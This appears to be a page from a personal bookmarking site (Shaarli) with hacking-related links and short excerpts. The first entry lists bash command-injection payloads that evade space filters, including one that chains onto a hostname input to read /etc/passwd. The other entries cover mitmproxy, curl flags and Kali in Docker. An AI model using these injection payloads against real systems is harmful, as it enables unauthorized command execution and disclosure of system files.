784 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
page 40 / 40
Newer►
  • thumbnail
    Command Injection Without Spaces

    {echo,hello,world}
    CMD=$'\x20a\x20b\x20c';echo$CMD
    CMD=$'\x20a\x20b\x20c'&&echo$CMD
    google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD

    December 10, 2018 at 4:43:56 PM UTC - permalink -
    QRCode
    - https://www.betterhacker.com/2016/10/command-injection-without-spaces.html
    command injection hacking linux bash bypass brace expansion
  • thumbnail
    How To: Use mitmproxy to read and modify HTTPS traffic - Philipp's Tech Blog
    December 6, 2018 at 4:26:43 PM UTC - permalink -
    QRCode
    - https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/
    mitm proxy http cli terminal
  • thumbnail
    curl - Tutorial

    --user-agent
    -X POST
    --user username:password // HTTP basic auth
    --data "username=toto&password=toto" // for POST method
    --cookie "data=mydata"
    --referer "my referer"

    December 6, 2018 at 3:19:22 PM UTC - permalink -
    QRCode
    - https://curl.haxx.se/docs/httpscripting.html
    curl scripting hacking
  • thumbnail
    Kali Linux In a Docker Container – Airman – Medium

    docker pull kalilinux/kali-linux-docker

    docker run -ti kalilinux/kali-linux-docker /bin/bash

    #apt update && apt upgrade && apt dist-upgrade && apt autoremove && apt clean

    apt install kali-linux-top10

    Exit container and commit changes

    docker ps -a

    docker commit <CONTAINER ID> my-kali

    December 6, 2018 at 3:15:13 PM UTC - permalink -
    QRCode
    - https://medium.com/@airman604/kali-linux-in-a-docker-container-5a06311624eb
    kali container vps docker persistent installation configuration
Links per page: 20 50 100
page 40 / 40
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation